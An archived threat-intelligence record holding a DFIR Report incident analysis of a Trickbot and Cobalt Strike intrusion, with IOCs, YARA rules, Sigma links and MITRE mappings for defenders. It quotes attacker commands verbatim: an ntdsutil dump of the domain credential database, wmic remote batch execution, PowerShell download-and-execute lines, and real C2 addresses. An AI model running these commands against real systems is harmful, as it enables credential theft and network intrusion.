{ "id": "2a357310-ba52-4e50-9a16-6bf4128ebe24", "created_at": "2026-04-06T00:16:40.54408Z", "updated_at": "2026-04-10T13:11:59.667994Z", "deleted_at": null, "sha1_hash": "841e2793873e3b285ff1c9add3902d0f5ee1672b", "title": "Trickbot Still Alive and Well", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 951014, "plain_text": "Trickbot Still Alive and Well\r\nBy editor\r\nPublished: 2021-01-11 · Archived: 2026-04-05 12:49:27 UTC\r\nIn October of 2020, the group behind the infamous botnet known as Trickbot had a bad few days. The group was under\r\nconcerted pressure applied by US Cyber Command infiltrating the botnet, and allegedly, providing alternate configuration\r\nfiles to break the bot’s connections to the larger network. At the same time, Microsoft along with other partners, secured\r\ncourt orders to take over and take down Trickbot command and control servers.\r\nWhile this did appear to have a short term effect on limiting the scope of the botnet operators, there have been reports on the\r\nlimits of its’ effectiveness. In our collection there was certainly a drop in overall Trickbot activity, but since the October\r\ndisruption, we have seen it begin to rise again; this is a recent intrusion from late December.\r\nCase Summary\r\nThe Trickbot threat actors used Cobalt Strike to pivot through-out the domain, dumping lsass and ntds.dit as they went. They\r\nused tools such as AdFind, Nltest, Net, Bloodhound, and PowerView to peruse the domain, looking for high privileged\r\ncredentials to accomplish their mission. They used PowerShell, SMB, and WMI to move laterally.\r\nAfter acquiring the necessary credentials, the threat actors used a technique called Overpass-the-hash to move to a backup\r\nserver, before being kicked off the network. We believe if this attack had been allowed to continue, it would have ended in\r\ndomain wide ransomware, specifically Ryuk.\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nThe original delivery mechanism was not found, but likely to have been a malicious email based on previous known\r\nTrickbot campaigns.\r\nExecution\r\nTrickbot was manually executed on a single endpoint. Source: Hatching Triage | Behavioral Report\r\nPrivilege Escalation\r\nDuring the intrusion, we witnessed the threat actors elevate privileges on several systems using the built-in GetSystem\r\nnamed pipe privilege escalation tool in Cobalt Strike.\r\nDefense Evasion\r\nAfter executing on the infected endpoint, the Trickbot executable injected itself into the Window Error Reporting Manager\r\n(wermgr.exe).\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 1 of 13\n\nSubsequent Trickbot command and control traffic then originated from the injected wermgr.exe process going forward.\r\nUsing the YARA rule generated by Malpedia we were able to locate Cobalt Strike injections in the following processes.\r\nProcess Name, PID, Rule, Host\r\n\"svchost.exe\",736,\"win_cobalt_strike_auto\",\"endpoint1\"\r\n\"svchost.exe\",3740,\"win_cobalt_strike_auto\",\"endpoint1\"\r\n\"ctfmon.exe\",992,\"win_cobalt_strike_auto\",\"endpoint1\"\r\n\"svchost.exe\",7680,\"win_cobalt_strike_auto\",\"endpoint1\"\r\n\"TSE28DF.exe\",5172,\"win_cobalt_strike_auto\",\"endpoint1\"\r\n\"dllhost.exe\",7440,\"win_cobalt_strike_auto\",\"endpoint1\"\r\n\"svchost.exe\",532,\"win_cobalt_strike_auto\",\"server1\"\r\n\"svchost.exe\",784,\"win_cobalt_strike_auto\",\"server2\"\r\n\"svchost.exe\",700,\"win_cobalt_strike_auto\",\"server3\"\r\nCredential Access\r\nThe threat actors employed a couple different credential access techniques. The first technique used was dumping passwords\r\nfrom lsass on the beachhead machine.\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 2 of 13\n\nAfter they gained access to a domain controller, we witnessed them use ntdsutil to run the following command:\r\nntdsutil \"ac in ntds\" \"ifm\" \"cr fu C:\\Perflogs\\1\"\r\nThe above command was executed from a batch file that was dropped and then executed using wmic.\r\nwmic /node:\"hostname\" process call create \"C:\\Perflogs\\12.bat\"\r\nThis command, which is included in DPAT, dumps NTDS.dit to disk and has been used by Trickbot actors in the past. The\r\nabove technique has been around since at least 2014 @chriscampell.\r\nEvent ID 2001, 2003, 102, 300, 301, 302, and 103 were all seen in response to the above command as well as a file create by\r\nlsass.\r\nDiscovery\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 3 of 13\n\nThe threat actors ran the AdFind utility for domain discovery.\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -gcb -sc trustdmp \u003e trustdmp.txt\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -f \"(objectcategory=group)\" \u003e ad_group.txt\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -subnets -f (objectCategory=subnet)\u003e subnets.txt\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -sc trustdmp \u003e trustdmp.txt\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -f \"(objectcategory=organizationalUnit)\" \u003e ad_ous.txt\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -f \"objectcategory=computer\" \u003e ad_computers.txt\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -f \"(objectcategory=person)\" \u003e ad_users.txt\r\nThe following net commands were used by the threat actor.\r\nnet user\r\nnet group \"domain admins\" /domain\r\nnet group \"enterprise admins\" /domain\r\nWhile on systems, we also saw them use the following commands.\r\nsysteminfo\r\nipconfig\r\nThe following Nltest commands were executed several times by the threat actors over the course of the intrusion.\r\nC:\\Windows\\system32\\cmd.exe /C nltest /dclist:\"DOMAINNAME\"\r\nC:\\Windows\\system32\\cmd.exe /C nltest /domain_trusts /all_trusts\r\nThe ping command was then used to test connectivity to the domain controllers and other systems.\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:57637/'); Get-NetComputer -ping -operatingsyst\r\nBloodhound was ran for domain attack path enumeration.\r\n[Original]\r\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAb\r\n[Decoded]\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:13875/'); Invoke-BloodHound -CollectionMethods\r\nThe following Powerview commands were also seen invoked by the threat actors for discovery.\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:35248/'); Get-NetComputer -operatingsystem *se\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:42680/'); Invoke-UserHunter -username actual_u\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:24774/'); Get-NetSession -computername actual_\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:20744/'); Get-NetRDPSession -computername actu\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:42762/'); Find-LocalAdminAccess\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:57637/'); Get-NetComputer -ping -operatingsyst\r\nLateral Movement\r\nThe threat actors utilized several lateral movement techniques. The first of which was using a remote service\r\nto execute PowerShell from the registry.\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 4 of 13\n\nAfter decoding the above command a couple times and xoring you are left with the following shellcode,\r\nwhich appears to include a named pipe.\r\nThis CyberChef Recipe was used to decode the above PS command\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nRemove_null_bytes()\r\nRegular_expression('User defined','[0-9a-zA-Z=+/]{30,}',true,true,false,false,false,false,'List matches')\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nGunzip()\r\nRegular_expression('User defined','[0-9a-zA-Z=+/]{30,}',true,true,false,false,false,false,'List matches')\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nXOR({'option':'Decimal','string':'35'},'Standard',false)\r\nThe next lateral movement method used is SMB transfer and exec of batch files.\r\nThis file was seen executed locally via cmd, and on remote systems using wmic.\r\n[Local]\r\nC:\\Windows\\system32\\cmd.exe /c C:\\Perflogs\\434.bat\r\n[Remote]\r\nwmic /node:\"192.168.1.2\" process call create \"C:\\Perflogs\\434.bat\"\r\nSMB was also used to transfer Cobalt Strike Beacon executables to the ADMIN$ share on systems, which were then\r\nexecuted via a service.\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 5 of 13\n\nAdditionally, we also witnessed the use of overpass-the-hash. Here we can see a 4624 event with seclogo as the logon\r\nprocess and logon type 9 which tells us some form of pass the hash occurred.\r\nShortly after we see a couple Kerberos service ticket requests for that user.\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 6 of 13\n\nThis alert fired a couple times based on network activity.\r\nHere’s some helpful information when looking for PTH or OPTH from Stealthbits\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 7 of 13\n\nCommand and Control\r\nCobalt Strike C2 #1:\r\n195.123.213.82:443\r\nJA3s:ae4edc6faf64d08308082ad26be60767\r\nJA3:51c64c77e60f3980eea90869b68c58a8, 72a589da586844d7f0818ce684948eea\r\nCertificate:[40:55:6e:74:38:4f:f5:64:95:52:c6:0b:88:c3:f4:02:d9:0c:0c:01 ]\r\nNot Before: 2020/12/07 08:36:31\r\nNot After: 2021/12/07 08:36:31\r\nIssuer Org: jQuery\r\nSubject Common: jquery.com\r\nSubject Org: jQuery\r\nPublic Algorithm:rsaEncryption\r\nJARM:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1\r\nExtracted Cobalt Strike Config:\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 8 of 13\n\nCobalt Strike C2 #2:\r\n88.119.174.135:356\r\nhtpdomrtx.com\r\nJA3s: ae4edc6faf64d08308082ad26be60767, 649d6810e8392f63dc311eecb6b7098b\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1, 649d6810e8392f63dc311eecb6b7098b\r\nCertificate:[1b:94:f1:b4:f2:e1:25:73:89:c3:e4:84:72:03:c2:d8:72:42:0d:05]\r\nNot Before: 2020/12/09 13:05:41\r\nNot After: 2021/12/09 13:05:41\r\nIssuer Org:\r\nSubject Common: htpdomrtx.com\r\nSubject Org Public Algorithm: rsaEncryption\r\nJARM:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1\r\nTrickbot Mor1\r\nImpact\r\nBased on the activity seen, we assess that the likely final actions would have been ransomware deployment across the\r\ndomain environment.\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 9 of 13\n\nBased on research from late last year by Kyle Ehmke, we can assess that the likely ransom deployment would have been\r\nRyuk (Wizard Spider / UNC1878).\r\nEnjoy our report? Please consider donating $1 or more to the project using Patreon. Thank you for your support!\r\nWe also have pcaps, files, and Kape packages available here. No memory captures are available for this case.\r\nIOCs\r\nhttps://misppriv.circl.lu/events/view/81809 @ https://otx.alienvault.com/pulse/5ffbbb184f9ff09be2b79b21\r\nNetwork\r\nTrickbot:\r\n41.243.29.182|449\r\n196.45.140.146|449\r\n103.87.25.220|443\r\n103.98.129.222|449\r\n103.87.25.220|449\r\n103.65.196.44|449\r\n103.65.195.95|449\r\n103.61.101.11|449\r\n103.61.100.131|449\r\n103.150.68.124|449\r\n103.137.81.206|449\r\n103.126.185.7|449\r\n103.112.145.58|449\r\n103.110.53.174|449\r\n102.164.208.48|449\r\n102.164.208.44|449\r\nCobalt Strike:\r\n88.119.174.135\r\nhtpdomrtx.com\r\n195.123.213.82\r\nEndpoint\r\nkpsiwn.exe\r\n4103d97c7cad79f050901aace0d9fbe0\r\ndead0bd2345e9769b5545f4ff628e5c59fb5ef9e\r\ne410123bde6a317cadcaf1fa3502301b7aad6f528d59b6b60c97be077ef5da00\r\nTSE588C.exe\r\n7e8af0acdc11b434ab2f1b6aae336027\r\nf8ceedecd74b161a7ea743a49e36120f48bb8c09\r\n32c13df5d411bf5a114e2021bbe9ffa5062ed1db91075a55fe4182b3728d62fe\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 10 of 13\n\nTSE28DF.exe\r\nc51ff408d6f9f78ab6fd41dbea1a9c01\r\n78188c006079cc3edb1ea37c8d1b2638da6bec40\r\n65282e01d57bbc75f24629be9de126f2033957bd8fe2f16ca2a12d9b30220b47\r\n12.bat\r\n49ada65eb7a29b03c5aeda0a43417f2b\r\nb47818f7094b57a4042c04678a067553ef477318\r\nb1deb8819c7659f3948a84032101cc61cad3801ee14d8df78e9e01b9c9d832d6\r\nDetections\r\nNetwork\r\n ETPRO TROJAN Observed Malicious SSL Cert (Cobalt Strike CnC)\r\n ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)\r\n ETPRO TROJAN Observed Trickbot Style SSL Cert (Internet Widgets Pty Ltd)\r\n ET POLICY Possible External IP Lookup ipinfo.io\r\n ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection\r\n ATTACK [PTsecurity] Overpass the hash. Encryption downgrade activity to ARCFOUR-HMAC-MD5\r\nSigma\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_powershell_enc_cmd.yml\r\nhttps://github.com/Neo23x0/sigma/blob/084cd39505861188d9d8f2d5c0f2835e4f750a3f/rules/windows/process_creation/win_malware_trickbot_recon_ac\r\nhttps://github.com/Neo23x0/sigma/blob/126a17a27696ee6aaaf50f8673a659124e260143/rules/windows/process_creation/win_susp_adfind.yml\r\nhttps://github.com/Neo23x0/sigma/blob/c56cd2dfff6343f3694ef4fd606a305415599737/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_\r\nhttps://github.com/Neo23x0/sigma/blob/d30502cdabbdd31a21f0b6ada019805caaea524d/rules/windows/process_creation/win_susp_wmi_execution.yml\r\nhttps://github.com/Neo23x0/sigma/blob/c56cd2dfff6343f3694ef4fd606a305415599737/rules/windows/process_creation/win_susp_ntdsutil.yml\r\nhttps://github.com/Neo23x0/sigma/blob/c56cd2dfff6343f3694ef4fd606a305415599737/rules/windows/builtin/win_overpass_the_hash.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_commands_recon_activity.yml\r\nYara\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2021-01-10\r\nIdentifier: exe\r\nReference: https://thedfirreport.com\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule cobalt_strike_TSE588C {\r\nmeta:\r\ndescription = \"exe - file TSE588C.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-01-05\"\r\nhash1 = \"32c13df5d411bf5a114e2021bbe9ffa5062ed1db91075a55fe4182b3728d62fe\"\r\nstrings:\r\n$s1 = \"mneploho86.dll\" fullword ascii\r\n$s2 = \"C:\\\\projects\\\\Project1\\\\Project1.pdb\" fullword ascii\r\n$s3 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s4 = \"AppPolicyGetThreadInitializationType\" fullword ascii\r\n$s5 = \"boltostrashno.nfo\" fullword ascii\r\n$s6 = \"operator\u003c=\u003e\" fullword ascii\r\n$s7 = \"operator co_await\" fullword ascii\r\n$s8 = \"?7; ?\u003c= \u003c?= 6\u003c\" fullword ascii /* hex encoded string 'v' */\r\n$s9 = \".data$rs\" fullword ascii\r\n$s10 = \"tutoyola\" fullword ascii\r\n$s11 = \"Ommk~z#K`majg`i4.itg~\\\".jkhbozk\" fullword ascii\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 11 of 13\n\n$s12 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s13 = \"OVOVPWTOVOWOTF\" fullword ascii\r\n$s14 = \"vector too long\" fullword ascii\r\n$s15 = \"n\u003elog2\" fullword ascii\r\n$s16 = \"\\\\khk|k|4.fzz~4!!majk d\" fullword ascii\r\n$s17 = \"network reset\" fullword ascii /* Goodware String - occured 567 times */\r\n$s18 = \"wrong protocol type\" fullword ascii /* Goodware String - occured 567 times */\r\n$s19 = \"owner dead\" fullword ascii /* Goodware String - occured 567 times */\r\n$s20 = \"connection already in progress\" fullword ascii /* Goodware String - occured 567 times */\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 900KB and\r\n( pe.imphash() == \"bb8169128c5096ea026d19888c139f1a\" or 10 of them )\r\n}\r\nrule trickbot_kpsiwn {\r\nmeta:\r\ndescription = \"exe - file kpsiwn.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-01-05\"\r\nhash1 = \"e410123bde6a317cadcaf1fa3502301b7aad6f528d59b6b60c97be077ef5da00\"\r\nstrings:\r\n$s1 = \"C:\\\\Windows\\\\explorer.exe\" fullword ascii\r\n$s2 = \"constructor or from DllMain.\" fullword ascii\r\n$s3 = \"esource\" fullword ascii\r\n$s4 = \"Snapping window demonstration\" fullword wide\r\n$s5 = \"EEEEEEEEEFFB\" ascii\r\n$s6 = \"EEEEEEEEEEFC\" ascii\r\n$s7 = \"EEEEEEEEEEFD\" ascii\r\n$s8 = \"DINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD\" fullword ascii\r\n$s9 = \"EFEEEEEEEEEB\" ascii\r\n$s10 = \"e[!0LoG\" fullword ascii\r\n$s11 = \"\u003e*P\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\" fullword ascii\r\n$s12 = \"o};k- \" fullword ascii\r\n$s13 = \"YYh V+ i\" fullword ascii\r\n$s14 = \"fdlvic\" fullword ascii\r\n$s15 = \"%FD%={\" fullword ascii\r\n$s16 = \"QnzwM#`8\" fullword ascii\r\n$s17 = \"xfbS/\u0026s:\" fullword ascii\r\n$s18 = \"1#jOSV9\\\"\" fullword ascii\r\n$s19 = \"JxYt1L=]\" fullword ascii\r\n$s20 = \"a3NdcMFSZEmJwXod1oyI@Tj4^mY+UsZqK3\u003efTg\u003cP*$4DC?y@esDpRk@T%t\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 1000KB and\r\n( pe.imphash() == \"a885f66621e03089e6c6a82d44a5ebe3\" or 10 of them )\r\n}\r\nrule cobalt_strike_TSE28DF {\r\nmeta:\r\ndescription = \"exe - file TSE28DF.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-01-05\"\r\nhash1 = \"65282e01d57bbc75f24629be9de126f2033957bd8fe2f16ca2a12d9b30220b47\"\r\nstrings:\r\n$s1 = \"mneploho86.dll\" fullword ascii\r\n$s2 = \"C:\\\\projects\\\\Project1\\\\Project1.pdb\" fullword ascii\r\n$s3 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s4 = \"AppPolicyGetThreadInitializationType\" fullword ascii\r\n$s5 = \"boltostrashno.nfo\" fullword ascii\r\n$s6 = \"operator\u003c=\u003e\" fullword ascii\r\n$s7 = \"operator co_await\" fullword ascii\r\n$s8 = \".data$rs\" fullword ascii\r\n$s9 = \"tutoyola\" fullword ascii\r\n$s10 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s11 = \"vector too long\" fullword ascii\r\n$s12 = \"wrong protocol type\" fullword ascii /* Goodware String - occured 567 times */\r\n$s13 = \"network reset\" fullword ascii /* Goodware String - occured 567 times */\r\n$s14 = \"owner dead\" fullword ascii /* Goodware String - occured 567 times */\r\n$s15 = \"connection already in progress\" fullword ascii /* Goodware String - occured 567 times */\r\n$s16 = \"network down\" fullword ascii /* Goodware String - occured 567 times */\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 12 of 13\n\n$s17 = \"protocol not supported\" fullword ascii /* Goodware String - occured 568 times */\r\n$s18 = \"connection aborted\" fullword ascii /* Goodware String - occured 568 times */\r\n$s19 = \"network unreachable\" fullword ascii /* Goodware String - occured 569 times */\r\n$s20 = \"host unreachable\" fullword ascii /* Goodware String - occured 571 times */\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 700KB and\r\n( pe.imphash() == \"ab74ed3f154e02cfafb900acffdabf9e\" or all of them )\r\n}\r\nMITRE\r\nUser Execution – T1204\r\nPass the Hash – T1550.002\r\nSMB/Windows Admin Shares – T1021.002\r\nProcess Injection – T1055\r\nOS Credential Dumping – T1003\r\nCredential Dumping – T1003\r\nAccount Discovery – T1087\r\nDomain Account – T1087.002\r\nDomain Groups – T1069.002\r\nDomain Trust Discovery – T1482\r\nRemote System Discovery – T1018\r\nRemote Services – T1021\r\nWindows Management Instrumentation – T1047\r\nPowerShell – T1059.001\r\nCommand-Line Interface – T1059\r\nCommonly Used Port – T1043\r\nNon-Standard Port – T1571\r\nStandard Application Layer Protocol – T1071\r\nExfiltration Over C2 Channel – T1041\r\nInternal case 1012\r\nSource: https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 13 of 13\n\n https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/ \nThis alert fired a couple times based on network activity. \nHere’s some helpful information when looking for PTH or OPTH from Stealthbits\n Page 7 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/" ], "report_names": [ "trickbot-still-alive-and-well" ], "threat_actors": [ { "id": "12211366-1f14-4eed-9d91-46b6a2ede618", "created_at": "2025-08-07T02:03:25.014713Z", "updated_at": "2026-04-10T02:00:03.624097Z", "deleted_at": null, "main_name": "GOLD ULRICK", "aliases": [ "Grim Spider ", "UNC1878 " ], "source_name": "Secureworks:GOLD ULRICK", "tools": [ "Bloodhound", "Buer Loader", "Cobalt Strike", "Conti", "Diavol", "PowerShell Empire", "Ryuk", "SystemBC", "Team9 (aka BazarLoader)", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "ab9d6b30-7c60-4d0b-8f49-e2e913c28508", "created_at": "2022-10-25T16:07:24.584775Z", "updated_at": "2026-04-10T02:00:05.042135Z", "deleted_at": null, "main_name": "UNC1878", "aliases": [], "source_name": "ETDA:UNC1878", "tools": [ "Agentemis", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "KEGTAP", "Ryuk", "Team9Backdoor", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f6f91e1c-9202-4497-bf22-9cd5ef477600", "created_at": "2023-01-06T13:46:38.86765Z", "updated_at": "2026-04-10T02:00:03.12735Z", "deleted_at": null, "main_name": "WIZARD SPIDER", "aliases": [ "TEMP.MixMaster", "GOLD BLACKBURN", "DEV-0193", "UNC2053", "Pistachio Tempest", "DEV-0237", "Storm-0230", "FIN12", "Periwinkle Tempest", "Storm-0193", "Trickbot LLC" ], "source_name": "MISPGALAXY:WIZARD SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e", "created_at": "2024-06-04T02:03:07.799286Z", "updated_at": "2026-04-10T02:00:03.606456Z", "deleted_at": null, "main_name": "GOLD BLACKBURN", "aliases": [ "ITG23 ", "Periwinkle Tempest ", "Wizard Spider " ], "source_name": "Secureworks:GOLD BLACKBURN", "tools": [ "BazarLoader", "Buer Loader", "Bumblebee", "Dyre", "Team9", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "0a4f4edc-ea8c-4a30-8ded-35394e29de01", "created_at": "2023-01-06T13:46:39.178183Z", "updated_at": "2026-04-10T02:00:03.23716Z", "deleted_at": null, "main_name": "UNC1878", "aliases": [], "source_name": "MISPGALAXY:UNC1878", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3", "created_at": "2022-10-25T16:07:24.422115Z", "updated_at": "2026-04-10T02:00:04.983298Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "DEV-0193", "G0102", "Gold Blackburn", "Gold Ulrick", "Grim Spider", "ITG23", "Operation BazaFlix", "Periwinkle Tempest", "Storm-0230", "TEMP.MixMaster", "Wizard Spider" ], "source_name": "ETDA:Wizard Spider", "tools": [ "AdFind", "Agentemis", "Anchor_DNS", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "Conti", "Diavol", "Dyranges", "Dyre", "Dyreza", "Dyzap", "Gophe", "Invoke-SMBAutoBrute", "KEGTAP", "LaZagne", "LightBot", "PowerSploit", "PowerTrick", "PsExec", "Ryuk", "SessionGopher", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "TrickMo", "Upatre", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434600, "ts_updated_at": 1775826719, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/841e2793873e3b285ff1c9add3902d0f5ee1672b.pdf", "text": "https://archive.orkl.eu/841e2793873e3b285ff1c9add3902d0f5ee1672b.txt", "img": "https://archive.orkl.eu/841e2793873e3b285ff1c9add3902d0f5ee1672b.jpg" } }